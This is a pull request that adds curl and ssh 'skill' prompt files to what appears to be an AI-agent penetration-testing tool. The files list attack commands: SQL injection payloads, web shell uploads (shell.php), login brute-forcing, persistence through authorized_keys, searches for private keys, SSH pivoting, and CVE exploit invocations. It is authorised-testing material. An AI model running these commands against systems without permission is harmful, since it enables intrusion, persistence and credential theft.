### PR TITLE
feat: add official curl and ssh skills

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -35,9 +35,11 @@ memory/*
 # GitHub Wiki clone (managed as separate repo: pentecter.wiki.git)
 wiki/
 
-# Skills — user-managed skill files (directory kept, contents ignored)
+# Skills — user-managed skill files (directory kept, official skills tracked)
 skills/*
 !skills/.gitkeep
+!skills/curl.md
+!skills/ssh.md
 
 # Config — only example files tracked
 config/*.yaml

--- a/skills/curl.md
+++ b/skills/curl.md
@@ -1,0 +1,83 @@
+---
+name: curl
+description: HTTP/HTTPS enumeration and testing with curl
+---
+
+Use curl to perform HTTP/HTTPS enumeration and testing on the target.
+
+## Basic Reconnaissance
+
+1. Fetch homepage and check response headers:
+   curl -ikL <url>
+
+2. Check HTTP methods allowed:
+   curl -ik -X OPTIONS <url>
+
+3. Follow redirects and show all headers:
+   curl -iLkv <url> 2>&1
+
+## Directory and Endpoint Discovery
+
+4. Test common paths (adjust for target):
+   curl -ikso /dev/null -w "%{http_code} %{size_download}" <url>/admin
+   curl -ikso /dev/null -w "%{http_code} %{size_download}" <url>/login
+   curl -ikso /dev/null -w "%{http_code} %{size_download}" <url>/api
+   curl -ikso /dev/null -w "%{http_code} %{size_download}" <url>/robots.txt
+   curl -ikso /dev/null -w "%{http_code} %{size_download}" <url>/.git/HEAD
+
+5. Enumerate with wordlist (one-liner):
+   while read path; do code=$(curl -ikso /dev/null -w "%{http_code}" "<url>/$path"); [ "$code" != "404" ] && echo "$code $path"; done < /usr/share/wordlists/dirb/common.txt
+
+## Authentication Testing
+
+6. Basic auth:
+   curl -ik -u admin:password <url>
+
+7. POST login form:
+   curl -ik -X POST -d "username=admin&password=admin" <url>/login
+
+8. JSON API auth:
+   curl -ik -X POST -H "Content-Type: application/json" -d '{"username":"admin","password":"admin"}' <url>/api/login
+
+9. Cookie-based session:
+   curl -ik -c cookies.txt -X POST -d "user=admin&pass=admin" <url>/login
+   curl -ik -b cookies.txt <url>/dashboard
+
+## SQL Injection Testing
+
+10. GET parameter test:
+    curl -ik "<url>/page?id=1'"
+    curl -ik "<url>/page?id=1 OR 1=1--"
+    curl -ik "<url>/page?id=1 UNION SELECT null,null,null--"
+
+11. POST parameter test:
+    curl -ik -X POST -d "user=admin'&pass=test" <url>/login
+    curl -ik -X POST -d "user=admin' OR '1'='1'--&pass=x" <url>/login
+
+## File Operations
+
+12. Download file:
+    curl -ikLO <url>/file.txt
+
+13. Upload file (multipart):
+    curl -ik -F "file=@shell.php" <url>/upload
+
+14. PUT method upload:
+    curl -ik -X PUT -d @shell.php <url>/shell.php
+
+## Useful Flags Reference
+
+- -i: Include response headers
+- -k: Skip TLS certificate verification
+- -L: Follow redirects
+- -v: Verbose (shows request/response headers)
+- -s: Silent (no progress bar)
+- -o /dev/null: Discard body
+- -w "%{http_code}": Print only status code
+- -H "Header: value": Custom header
+- -b cookies.txt: Send cookies
+- -c cookies.txt: Save cookies
+- -d "data": POST body
+- -X METHOD: HTTP method
+- -A "User-Agent": Custom User-Agent
+- --proxy http://127.0.0.1:8080: Route through proxy (Burp)

--- a/skills/ssh.md
+++ b/skills/ssh.md
@@ -1,0 +1,95 @@
+---
+name: ssh
+description: SSH connection, tunneling, and pivoting techniques
+---
+
+Use SSH for connecting, tunneling, port forwarding, and pivoting.
+
+## Connection
+
+1. Password auth:
+   ssh user@<target>
+   sshpass -p '<pass>' ssh -o StrictHostKeyChecking=no user@<target>  # nosemgrep: detected-ssh-password
+
+2. Key auth:
+   ssh -i id_rsa user@<target>
+   chmod 600 id_rsa  (fix permissions if needed)
+
+3. Non-standard port:
+   ssh -p 2222 user@<target>
+
+4. Force password auth (disable key):
+   ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@<target>
+
+## Enumeration
+
+5. Banner grab:
+   nmap -sV -p22 <target>
+   nc -vn <target> 22
+
+6. Enumerate auth methods:
+   ssh -v user@<target> 2>&1 | grep "Authentications that can continue"
+
+7. Check for weak keys:
+   ssh-audit <target>
+
+## Port Forwarding
+
+8. Local port forward (access remote service through local port):
+   ssh -L 8080:127.0.0.1:80 user@<target>
+   # Now access http://127.0.0.1:8080 to reach target's port 80
+
+9. Local forward to internal host (pivot):
+   ssh -L 3306:10.10.10.5:3306 user@<target>
+   # Access internal host 10.10.10.5:3306 via localhost:3306
+
+10. Remote port forward (expose local service to target):
+    ssh -R 4444:127.0.0.1:4444 user@<target>
+    # Target can reach attacker's port 4444 via its own localhost:4444
+
+11. Dynamic SOCKS proxy (full pivot):
+    ssh -D 1080 user@<target>
+    # Configure proxychains: socks5 127.0.0.1 1080
+    proxychains nmap -sT 10.10.10.0/24
+
+## File Transfer
+
+12. SCP download:
+    scp user@<target>:/path/to/file ./local_file
+
+13. SCP upload:
+    scp ./local_file user@<target>:/tmp/
+
+14. SCP with key:
+    scp -i id_rsa user@<target>:/etc/passwd ./
+
+15. SFTP interactive:
+    sftp user@<target>
+
+## SSH Key Operations
+
+16. Generate key pair:
+    ssh-keygen -t rsa -b 4096 -f ./id_rsa -N ""
+
+17. Add public key to target (persistence):
+    echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys
+
+18. Extract private key from found files:
+    find / -name "id_rsa" -o -name "*.pem" -o -name "*.key" 2>/dev/null
+
+## Tunneling Chains
+
+19. ProxyJump (SSH through jump host):
+    ssh -J user1@jump:22 user2@internal
+
+20. SSH over SSH tunnel:
+    ssh -L 2222:internal:22 user@jump
+    ssh -p 2222 user@127.0.0.1
+
+## Common Exploits
+
+21. OpenSSH < 7.7 username enumeration (CVE-2018-15473):
+    python3 ssh_user_enum.py <target> -w /usr/share/wordlists/names.txt
+
+22. libssh auth bypass (CVE-2018-10933):
+    python3 libssh_bypass.py <target>


### PR DESCRIPTION
## Summary
- Add `/curl` skill: HTTP enumeration, auth testing, SQLi probing, file ops, flag reference
- Add `/ssh` skill: sshpass, key auth, port forwarding, tunneling, pivoting, common exploits
- Update .gitignore to track official skills (`!skills/curl.md`, `!skills/ssh.md`)

## Motivation
AI agent was struggling with:
- curl flag combinations (`-ikL`, `-w`, cookie handling)
- sshpass command construction
- SSH port forwarding syntax (`-L`, `-R`, `-D`)

## Test plan
- [x] Skills load correctly via `go test ./internal/skills/...`
- [x] `/curl` and `/ssh` expand to skill prompts

Closes #61

🤖 Generated with [Claude Code](https://claude.com/claude-code)